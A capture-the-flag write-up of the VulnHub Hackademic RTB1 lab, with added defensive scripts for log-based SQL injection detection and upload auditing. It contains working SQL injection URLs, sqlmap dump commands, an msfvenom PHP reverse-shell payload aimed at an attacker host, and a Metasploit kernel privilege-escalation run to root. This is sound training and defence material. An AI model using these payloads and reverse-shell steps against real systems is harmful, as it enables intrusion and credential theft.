
vulnhub-Hackademic.RTB1

小海
2023-02-21 / 0 comments / 2 likes / 685 views / 7,679 characters
Note:
This post was last updated on 2023-02-23. If any content or images no longer work, please leave a comment. Some material comes from the web; if it unintentionally affects your interests, please contact us to have it removed.

1. Target information

Name: Hackademic: RTB1 (medium difficulty)
Date release: 6 Sep 2011
Author: mr.pr0n
Series: Hackademic
Target IP: 192.168.33.130

2. Information gathering

1) Port scan

nmap -sV 192.168.33.130 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-21 07:18 EST
Nmap scan report for 192.168.33.130
Host is up (0.00021s latency).
Not shown: 988 filtered tcp ports (no-response), 10 filtered tcp ports (host-prohibited)
PORT   STATE  SERVICE VERSION
22/tcp closed ssh
80/tcp open   http    Apache httpd 2.2.15 ((Fedora))
MAC Address: 00:0C:29:B9:22:10 (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.47 seconds
The scan shows port 22 (reported as closed) and port 80 open, running Apache httpd 2.2.15; the target system is Fedora.

2) Opening the web interface, a SQL injection point was found at http://192.168.33.130/Hackademic_RTB1/?cat=1
3) Directory scan

Nothing useful was found here.
  _|. _ _  _  _  _ _|_    v0.4.2.6
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11347

Output File: /root/Desktop/目录扫描/dirsearch/reports/192.168.33.130/__23-02-21_19-14-24.txt

Target: http://192.168.33.130/

[19:14:24] Starting:                                                                                                                                                         
[19:14:25] 403 -  293B  - /.ht_wsr.txt                                      
[19:14:25] 403 -  296B  - /.htaccess.bak1                                   
[19:14:25] 403 -  296B  - /.htaccess_orig
[19:14:25] 403 -  296B  - /.htaccess.save
[19:14:25] 403 -  298B  - /.htaccess.sample
[19:14:25] 403 -  296B  - /.htaccess.orig
[19:14:25] 403 -  294B  - /.htaccessOLD
[19:14:25] 403 -  294B  - /.htaccess_sc                                     
[19:14:25] 403 -  286B  - /.htm
[19:14:25] 403 -  287B  - /.html
[19:14:25] 403 -  295B  - /.htaccessOLD2
[19:14:25] 403 -  297B  - /.htaccess_extra
[19:14:25] 403 -  296B  - /.htpasswd_test
[19:14:25] 403 -  293B  - /.httr-oauth
[19:14:25] 403 -  292B  - /.htpasswds                                       
[19:14:25] 403 -  294B  - /.htaccessBAK
[19:14:33] 403 -  290B  - /cgi-bin/                                         
[19:14:36] 403 -  288B  - /error/                                           
[19:14:38] 200 -    1KB - /index.html                                       
[19:14:42] 403 -  292B  - /phpMyAdmin                                       
[19:14:42] 403 -  292B  - /phpmyadmin                                       
[19:14:43] 403 -  293B  - /phpmyadmin/                                      
[19:14:43] 403 -  293B  - /phpMyAdmin/
[19:14:43] 403 -  313B  - /phpmyadmin/docs/html/index.html
[19:14:43] 403 -  302B  - /phpmyadmin/ChangeLog
[19:14:43] 403 -  302B  - /phpmyadmin/index.php
[19:14:43] 403 -  312B  - /phpmyadmin/doc/html/index.html                   
[19:14:43] 403 -  310B  - /phpMyAdmin/scripts/setup.php
[19:14:43] 403 -  313B  - /phpMyAdmin/phpMyAdmin/index.php
[19:14:43] 403 -  313B  - /phpmyadmin/phpmyadmin/index.php                  
[19:14:43] 403 -  299B  - /phpmyadmin/README
[19:14:43] 403 -  310B  - /phpmyadmin/scripts/setup.php
[19:14:43] 403 -  302B  - /phpMyAdmin/index.php                             
                                                                             
Task Completed


Scanning the application directory instead turned up wp-login.php, which is the back-end login page.
└─# python dirsearch.py -u http://192.168.33.130/Hackademic_RTB1/

  _|. _ _  _  _  _ _|_    v0.4.2.6
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11347

Output File: /root/Desktop/目录扫描/dirsearch/reports/192.168.33.130/_Hackademic_RTB1__23-02-21_19-17-57.txt

Target: http://192.168.33.130/Hackademic_RTB1/

[19:17:57] Starting:                                                                                                                                                         
[19:17:58] 403 -  309B  - /Hackademic_RTB1/.ht_wsr.txt                      
[19:17:58] 403 -  314B  - /Hackademic_RTB1/.htaccess.sample                 
[19:17:58] 403 -  312B  - /Hackademic_RTB1/.htaccess.bak1
[19:17:58] 403 -  312B  - /Hackademic_RTB1/.htaccess_orig
[19:17:58] 403 -  312B  - /Hackademic_RTB1/.htaccess.save
[19:17:58] 403 -  310B  - /Hackademic_RTB1/.htaccessOLD
[19:17:58] 403 -  311B  - /Hackademic_RTB1/.htaccessOLD2
[19:17:58] 403 -  312B  - /Hackademic_RTB1/.htaccess.orig
[19:17:58] 403 -  313B  - /Hackademic_RTB1/.htaccess_extra                  
[19:17:58] 403 -  310B  - /Hackademic_RTB1/.htaccessBAK
[19:17:58] 403 -  303B  - /Hackademic_RTB1/.html
[19:17:58] 403 -  302B  - /Hackademic_RTB1/.htm
[19:17:58] 403 -  308B  - /Hackademic_RTB1/.htpasswds
[19:17:58] 403 -  309B  - /Hackademic_RTB1/.httr-oauth
[19:17:58] 403 -  312B  - /Hackademic_RTB1/.htpasswd_test
[19:17:58] 403 -  310B  - /Hackademic_RTB1/.htaccess_sc                     
[19:18:11] 500 -    2KB - /Hackademic_RTB1/index.php                        
[19:18:11] 404 -    2KB - /Hackademic_RTB1/index.php/login/                 
[19:18:12] 200 -   15KB - /Hackademic_RTB1/license.txt                      
[19:18:17] 200 -    9KB - /Hackademic_RTB1/readme.html                      
[19:18:24] 301 -  335B  - /Hackademic_RTB1/wp-admin  ->  http://192.168.33.130/Hackademic_RTB1/wp-admin/
[19:18:24] 200 -  184B  - /Hackademic_RTB1/wp-admin/setup-config.php        
[19:18:24] 200 -    0B  - /Hackademic_RTB1/wp-config.php                    
[19:18:24] 200 -    1KB - /Hackademic_RTB1/wp-admin/install.php
[19:18:24] 302 -    0B  - /Hackademic_RTB1/wp-admin/  ->  /Hackademic_RTB1/wp-login.php?redirect_to=%2FHackademic_RTB1%2Fwp-admin%2F
[19:18:24] 200 -    1KB - /Hackademic_RTB1/wp-content/                      
[19:18:24] 301 -  337B  - /Hackademic_RTB1/wp-content  ->  http://192.168.33.130/Hackademic_RTB1/wp-content/
[19:18:24] 500 -    0B  - /Hackademic_RTB1/wp-content/plugins/hello.php     
[19:18:24] 301 -  338B  - /Hackademic_RTB1/wp-includes  ->  http://192.168.33.130/Hackademic_RTB1/wp-includes/
[19:18:24] 200 -    0B  - /Hackademic_RTB1/wp-includes/rss-functions.php    
[19:18:24] 200 -    6KB - /Hackademic_RTB1/wp-includes/
[19:18:24] 200 -    1KB - /Hackademic_RTB1/wp-login.php                     
[19:18:24] 200 -    2KB - /Hackademic_RTB1/wp.php                           
[19:18:24] 200 -    1KB - /Hackademic_RTB1/wp-register.php
[19:18:24] 200 -   42B  - /Hackademic_RTB1/xmlrpc.php  

3. SQL injection

Testing http://192.168.33.130/Hackademic_RTB1/?cat=1 for SQL injection

http://192.168.33.130/Hackademic_RTB1/?cat=1 order by 5 gives the number of columns
http://192.168.33.130/Hackademic_RTB1/?cat=1%20and%201=2%20union%20select%201,(select%20group_concat(schema_name)%20from%20information_schema.schemata),3,4,5 gives the database names

Then let sqlmap do the rest in one go

└─# sqlmap -u "http://192.168.33.130/Hackademic_RTB1/?cat=1" --dbs --batch
└─# sqlmap -u "http://192.168.33.130/Hackademic_RTB1/?cat=1" -D wordpress --tables --batch
└─# sqlmap -u "http://192.168.33.130/Hackademic_RTB1/?cat=1" -D wordpress -T wp_users --columns --batch
└─# sqlmap -u "http://192.168.33.130/Hackademic_RTB1/?cat=1" -D wordpress -T wp_users --dump --batch

The user data finally obtained is:
|No.|Password|Username|
|-------|-------|-------|
|1|admin|NickJames|
|2|kernel|MaxBucky|
|3|maxwell|JasonKonnors|
|4|napoleon|TonyBlack|
|5|q1w2e3|GeorgeMiller|
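From the defender's side, both phases above leave a very recognisable trace in the web server's access log: the directory scan produces a burst of 403/404 responses from one address within seconds, and the manual injection tests and sqlmap requests carry "order by", "union select", "information_schema" or tautologies such as "and 1=2" in the query string. The script below is an added example, not code from the original post; it parses constructed Apache combined-format log lines modelled on the requests seen in this walkthrough (the addresses, sizes and user-agent strings are made up for the demo) and flags SQL-injection-shaped requests, 403/404 bursts per source address, and known scanner user agents.

```python
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import unquote_plus

# Constructed sample log lines (Apache combined format) modelled on this walkthrough:
# dirsearch probing, manual "order by"/"union select" tests and an sqlmap request.
SAMPLE_LOG = """
192.168.33.129 - - [21/Feb/2023:19:14:25 -0500] "GET /.ht_wsr.txt HTTP/1.1" 403 293 "-" "Mozilla/5.0 (dirsearch)"
192.168.33.129 - - [21/Feb/2023:19:14:25 -0500] "GET /.htaccess.bak1 HTTP/1.1" 403 296 "-" "Mozilla/5.0 (dirsearch)"
192.168.33.129 - - [21/Feb/2023:19:14:26 -0500] "GET /.htaccess.orig HTTP/1.1" 403 296 "-" "Mozilla/5.0 (dirsearch)"
192.168.33.129 - - [21/Feb/2023:19:14:33 -0500] "GET /cgi-bin/ HTTP/1.1" 403 290 "-" "Mozilla/5.0 (dirsearch)"
192.168.33.129 - - [21/Feb/2023:19:14:36 -0500] "GET /error/ HTTP/1.1" 403 288 "-" "Mozilla/5.0 (dirsearch)"
192.168.33.129 - - [21/Feb/2023:19:14:38 -0500] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (dirsearch)"
192.168.33.129 - - [21/Feb/2023:19:14:42 -0500] "GET /phpMyAdmin HTTP/1.1" 403 292 "-" "Mozilla/5.0 (dirsearch)"
192.168.33.129 - - [21/Feb/2023:19:25:02 -0500] "GET /Hackademic_RTB1/?cat=1%20order%20by%205 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.168.33.129 - - [21/Feb/2023:19:25:40 -0500] "GET /Hackademic_RTB1/?cat=1%20and%201=2%20union%20select%201,(select%20group_concat(schema_name)%20from%20information_schema.schemata),3,4,5 HTTP/1.1" 200 5200 "-" "Mozilla/5.0"
192.168.33.129 - - [21/Feb/2023:19:30:11 -0500] "GET /Hackademic_RTB1/?cat=1%20AND%207541=7541 HTTP/1.1" 200 5120 "-" "sqlmap/1.7"
10.0.0.5 - - [21/Feb/2023:19:31:00 -0500] "GET /Hackademic_RTB1/?cat=2 HTTP/1.1" 200 5000 "-" "Mozilla/5.0"
"""

# Apache combined log format: ip ident user [time] "method path proto" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Query-string fragments typical of SQL injection probing (matched on the URL-decoded path).
SQLI_RE = re.compile(
    r"\bunion\b\s+(?:all\s+)?select\b"
    r"|\border\s+by\s+\d+"
    r"|information_schema"
    r"|\b(?:sleep|benchmark)\s*\("
    r"|\b(?:and|or)\b\s+\d+\s*=\s*\d+",
    re.IGNORECASE,
)

TOOL_MARKERS = ("sqlmap", "dirsearch", "nikto", "gobuster")


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    e = m.groupdict()
    e["status"] = int(e["status"])
    e["time"] = datetime.strptime(e["ts"], "%d/%b/%Y:%H:%M:%S %z")
    e["decoded_path"] = unquote_plus(e["path"])
    return e


def find_sqli(entries):
    """Return (ip, decoded path, matched fragment) for every SQLi-shaped request."""
    hits = []
    for e in entries:
        m = SQLI_RE.search(e["decoded_path"])
        if m:
            hits.append((e["ip"], e["decoded_path"], m.group(0)))
    return hits


def find_scan_bursts(entries, threshold=5, window_s=60):
    """Map ip -> largest number of 403/404 responses inside any window of window_s seconds."""
    by_ip = defaultdict(list)
    for e in entries:
        if e["status"] in (403, 404):
            by_ip[e["ip"]].append(e["time"])
    bursts = {}
    for ip, times in by_ip.items():
        times.sort()
        best, start = 0, 0
        for end in range(len(times)):  # sliding window over sorted timestamps
            while (times[end] - times[start]).total_seconds() > window_s:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            bursts[ip] = best
    return bursts


def find_tool_agents(entries):
    """Return the set of (ip, tool) pairs whose user agent names a known scanner."""
    hits = set()
    for e in entries:
        ua = e["ua"].lower()
        for tool in TOOL_MARKERS:
            if tool in ua:
                hits.add((e["ip"], tool))
    return hits


def analyse(text):
    """Run all three detectors over raw log text and return their findings."""
    entries = [e for e in (parse_line(l) for l in text.splitlines() if l.strip()) if e]
    return {
        "sqli": find_sqli(entries),
        "bursts": find_scan_bursts(entries),
        "tool_agents": find_tool_agents(entries),
    }


if __name__ == "__main__":
    for kind, findings in analyse(SAMPLE_LOG).items():
        print(kind, findings)
```

On the sample data the third detector is the weakest: user agents are trivially changed, so the burst counter and the decoded-query patterns are the signals to alert on. Decoding the path before matching matters because the page's own payloads arrive percent-encoded, and a pattern applied to the raw URL would miss "union%20select".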

4. Getting a shell

Tried logging in with the credentials just dumped; GeorgeMiller turned out to have permission to change the configuration. Under Options -> Miscellaneous, PHP can be added to the allowed upload file types, after which a PHP shell can be uploaded via Upload.
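The weakness exploited here is a configuration one: an upload allow-list that includes a server-side executable extension, combined with a web server that will execute PHP from the upload directory. The following script is an added example, not code from the original post or from WordPress; it treats the allow-list as a plain space-separated string (a constructed stand-in for the setting, not the real option name) and audits a constructed upload tree both for files with executable extensions and for PHP open tags hidden inside files that claim to be images.

```python
import re
import tempfile
from pathlib import Path

# Extensions the web server would typically hand to the PHP interpreter.
DANGEROUS_EXT = {".php", ".php3", ".php4", ".php5", ".phtml", ".phar"}
# PHP open tag ("<?php" or the short echo tag "<?="), matched on raw bytes.
PHP_TAG = re.compile(rb"<\?(php|=)", re.IGNORECASE)


def risky_allowed_types(allow_list):
    """Entries of a space-separated upload allow-list that map to an executable extension.

    The allow-list format is a constructed stand-in for the 'allowed file types' setting
    mentioned in the post, not the real option."""
    return {t for t in allow_list.lower().split() if "." + t.lstrip(".") in DANGEROUS_EXT}


def audit_upload_dir(root, max_read=4096):
    """Walk an upload directory and return (relative path, reason) for suspicious files."""
    findings = []
    for path in sorted(Path(root).rglob("*")):
        if not path.is_file():
            continue
        rel = path.relative_to(root).as_posix()
        if path.suffix.lower() in DANGEROUS_EXT:
            findings.append((rel, "executable extension in upload directory"))
            continue
        with path.open("rb") as fh:
            head = fh.read(max_read)  # only the first max_read bytes are inspected
        if PHP_TAG.search(head):
            findings.append((rel, "PHP open tag inside a non-PHP file"))
    return findings


def build_demo_tree():
    """Constructed sample upload tree: a real JPEG header, a dropped .php file,
    and a .jpg that carries a PHP tag after a GIF header. No real payload is used."""
    root = Path(tempfile.mkdtemp(prefix="wp-uploads-"))
    month = root / "2023" / "02"
    month.mkdir(parents=True)
    (month / "photo.jpg").write_bytes(b"\xff\xd8\xff\xe0" + b"\x00" * 64)
    (month / "shell.php").write_bytes(b"<?php /* constructed stand-in, no real code */ ?>")
    (month / "avatar.jpg").write_bytes(b"GIF89a<?php echo 1; ?>")
    return root


if __name__ == "__main__":
    print("risky allow-list entries:", risky_allowed_types("jpg jpeg gif png php"))
    for rel, reason in audit_upload_dir(build_demo_tree()):
        print(f"{rel}: {reason}")
```

The second check exists because renaming is not the only way a PHP file reaches an upload directory: a file that passes an extension filter can still contain PHP, and whether it runs then depends entirely on the web server's handler mapping. The durable fix is therefore on the server side (no script execution from the upload directory at all), with an audit like this one as a periodic integrity check rather than the primary control.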
Generate the PHP payload

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.33.129 lport=6789 -f raw > ./shell.php

Start the listener
Visiting the URL of the uploaded file brings the session up
Checking the kernel version shows 2.6.3

Privilege escalation

msf6 > search 2.6.3

Matching Modules
================

   #  Name                                                 Disclosure Date  Rank       Check  Description
   -  ----                                                 ---------------  ----       -----  -----------
   0  exploit/windows/http/hp_mpa_job_acct                 2011-12-21       excellent  Yes    HP Managed Printing Administration jobAcct Remote Command Execution
   1  exploit/linux/local/sock_sendpage                    2009-08-13       great      Yes    Linux Kernel Sendpage Local Privilege Escalation
   2  exploit/linux/local/rds_rds_page_copy_user_priv_esc  2010-10-20       great      Yes    Reliable Datagram Sockets (RDS) rds_page_copy_user Privilege Escalation
   3  auxiliary/admin/http/telpho10_credential_dump        2016-09-02       normal     No     Telpho10 Backup Credentials Dumper


Interact with a module by name or index. For example info 3, use 3 or use auxiliary/admin/http/telpho10_credential_dump

msf6 > use exploit/linux/local/rds_rds_page_copy_user_priv_esc 
[*] Using configured payload linux/x86/meterpreter/reverse_tcp
msf6 exploit(linux/local/rds_rds_page_copy_user_priv_esc) > set session 1
session => 1
msf6 exploit(linux/local/rds_rds_page_copy_user_priv_esc) > set lport 6789
lport => 6789
msf6 exploit(linux/local/rds_rds_page_copy_user_priv_esc) > set lhost 192.168.33.129
lhost => 192.168.33.129
msf6 exploit(linux/local/rds_rds_page_copy_user_priv_esc) > run
msf6 exploit(linux/local/rds_rds_page_copy_user_priv_esc) > run

[!] SESSION may not be compatible with this module:
[!]  * incompatible session architecture: php
[*] Started reverse TCP handler on 192.168.33.129:6789 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Writing '/tmp/.w2iBkASs' (235 bytes) ...
[*] Launching exploit...
[*] Sending stage (1017704 bytes) to 192.168.33.130
[*] Meterpreter session 2 opened (192.168.33.129:6789 -> 192.168.33.130:56310) at 2023-02-21 20:03:55 -0500
meterpreter > shell 
Process 4879 created.
Channel 1 created.
whoami
root
ls
plugins
shell.php
themes
cd /
ls
bin
boot
dev
etc
home
lib
lost+found
media
mnt
opt
proc
root
sbin
selinux
srv
sys
tmp
usr
var
cd /root
ls
Desktop
anaconda-ks.cfg
key.txt
key.txt~
cat key.txt
Yeah!!
You must be proud because you 've got the password to complete the First *Realistic* Hackademic Challenge (Hackademic.RTB1) :)

$_d&jgQ>>ak\#b"(Hx"o<la_%

Regards,
mr.pr0n || p0wnbox.Team || 2011
http://p0wnbox.com


5. Summary

This attack path started from the SQL injection vulnerability, which dumped the account credentials from the database; a directory scan then found the back-end login page, an upload point was located to upload a reverse-shell file and obtain a shell, and finally the Linux kernel was used for privilege escalation. Next I should study sqlmap in more detail and put extra practice into privilege-escalation techniques.
